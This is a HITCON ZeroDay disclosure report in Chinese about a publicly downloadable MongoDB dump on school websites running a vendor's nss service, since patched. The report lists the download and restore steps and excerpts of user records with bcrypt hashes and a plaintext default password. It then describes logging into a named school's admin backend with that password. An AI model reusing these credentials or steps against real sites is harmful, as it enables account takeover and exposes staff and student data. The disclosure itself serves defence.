恆煦資訊股份有限公司學校nss網站資料庫封存檔洩漏漏洞

Vulnerability Overview

ZDID: ZD-2026-00521
發信 Vendor: 恆煦資訊股份有限公司
Title: 恆煦資訊股份有限公司學校nss網站資料庫封存檔洩漏漏洞
Introduction: 在多個使用該公司nss服務的學校網站中發現其資料庫封存檔，內含大量管理員、使用者帳號與加密過的密碼和部分明文密碼(後面會詳述)，且任何人無須驗證就可以直接下載該檔案。

處理狀態

目前狀態

公開

Last Update : 2026/06/02

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2026/04/10 13:27:09 : 新提交 (由 H.L. 更新此狀態)
2026/04/14 20:01:32 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/05/13 15:54:08 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/05/13 15:54:08 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/05/13 15:54:08 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/05/25 16:00:04 : 已修補 (由組織帳號更新此狀態)
2026/06/02 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2026-00521
通報者：havelight (H.L.)
風險：嚴重
類型：資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

【漏洞利用步驟】

1.下載該資料庫檔案：

curl -O https://www.hmjh.tp.edu.tw/uploads/dump.tar.gz

2.解壓縮該檔案：

7z x dump.tar.gz

此時的./dump資料夾中會有數個子資料夾，裡面有多個JSON/BSON檔案。
而因為這個dump.tar.gz是MongoDB的資料庫封存檔，因此

3.使用MongoDB應用程式將dump復原為資料庫

此時已經得到了該資料庫的原始資料。
標題中提到的帳號與加密密碼等資料就在這些JSON之中。
該資料庫不只包含單一校網的資料，惟從各使用該系統的校網(下稱nss校網)下載到的dump.tar.gz是完全一樣的；其他學校例如松山高中、景美女中也可以下載這個檔案。
(神奇的是，該公司官網的網址也有/nss，但卻反而下載不到這個檔案)

4.打開users.json，發現名為lastThreeTimesPwd的「修改之前的密碼」欄位資料被以明文儲存，注意到有些學校的帳號會一併註冊，因此可以找到如

{"_id":{"$oid":"65e5b14817f89bb525d6c1b3"},"licence":{"$oid":"62348fc39a382147610dc9dd"},"username":"D0051","__v":1,"ctime":{"$date":"2024-03-04T11:32:24.217Z"},"disabled":false,"email":"[email protected]","lastThreeTimesPwd":["Hmjh28979001"],"loginFailCount":0,"name":"文書組","password":"$2a$10$QzVL.nnVUdp061EPPEYxy.fzXoy5jro3Z7MWydkKmiA2.Dg6Br942","tags":[],"utime":{"$date":"2024-05-08T01:08:12.199Z"},"verified":true,"llip":"163.21.22.4","llt":{"$date":"2024-05-08T01:08:12.198Z"},"lastChangePwd":{"$date":"2024-04-23T02:01:35Z"},"loginFailTime":{"$date":"2024-05-08T01:07:22Z"

和

{"_id":{"$oid":"65e5b1ea6c356db4dcf5b498"},"licence":{"$oid":"62348fc39a382147610dc9dd"},"username":"E0062","__v":2,"ctime":{"$date":"2024-03-04T11:35:06.658Z"},"disabled":false,"email":"[email protected]","lastThreeTimesPwd":["Hmjh28979001","KI1whEx3"],"loginFailCount":0,"name":"資料組","password":"$2a$10$DBAq6S7uSJsrHdrv1t9NyeT2fj5j.YrDQe.ekH9/k.3GliUzeu50y","tags":[],"utime":{"$date":"2024-08-14T01:25:15.433Z"},"verified":true,"llip":"163.21.22.4","llt":{"$date":"2024-08-14T01:25:15.432Z"},"loginFailTime":{"$date":"2024-04-01T03:42:26Z"},"lastChangePwd":{"$date":"2024-08-13T03:06:47Z"

的資料，根據這兩個帳號的lastThreeTimesPwd，推斷該校創立這些帳號時預設的密碼應該是Hmjh28979001，接著找到

{"_id":{"$oid":"65e5b1ea6c356db4dcf5b49a"},"licence":{"$oid":"62348fc39a382147610dc9dd"},"username":"E0063","__v":0,"ctime":{"$date":"2024-03-04T11:35:06.658Z"},"disabled":false,"email":"[email protected]","lastThreeTimesPwd":[],"loginFailCount":0,"name":"特教組","password":"$2a$10$98J2TnAZGQUTRYMAjn6SxeeaSKxMiN5SY0BfI3YQ7ekec07rpyqKi","tags":[],"utime":{"$date":"2024-08-14T06:44:58.233Z"},"verified":true,"llip":"163.21.22.4","llt":{"$date":"2024-08-14T06:42:27.816Z"

會發現帳號名稱E0063的特教組帳號未被變更過密碼。另外，根據HMJH可得知其為台北市立新民國中。

5.進入該校校網登入介面，輸入帳號E0063和密碼Hmjh28979001，登入成功(取得校網後台權限)，證明該資料庫的明文資料中有嚴重的洩漏風險。其他帳號亦可能被洩漏了密碼，在此不另做測試。

附註：從login_records.json可以看出，本資料庫封存的時間在2024年8月中旬，含括資料則從2022年3月中旬開始。

【造成影響】

1.大量使用者隱私資料洩漏，包含全名、學號、部分人員身份證字號、部分人員電子郵件帳號、帳號、加密密碼等。

2.部分帳號密碼明文洩漏，使得攻擊者可以輕易接管這些帳號，且這些帳號多有該校校網的管理員權限，因此可能直接影響校網內容安全性。

密碼明文洩漏若搭配使用者的電子郵件帳號，甚至可能進一步導致其他在校網系統以外的帳號遭接管。

修補建議

1.上傳到在nss各校網的`/uploads`中的檔案會被強制隨機重新命名，因此很難透過窮舉、字典攻擊的方式掃到，然而此資料庫卻以原始檔名存放，且從各nss校網域都能下載到該檔案，大幅提高了資料洩漏的風險。應立即撤下該檔案，並強化檢查`/uploads`重新命名機制。

2.將資料庫中的`lastThreeTimesPwd`項目也加密，以免間接洩漏密碼明文。

3.對所有在本次事件洩漏帳號密碼的帳戶發出警告，或要求其修改密碼。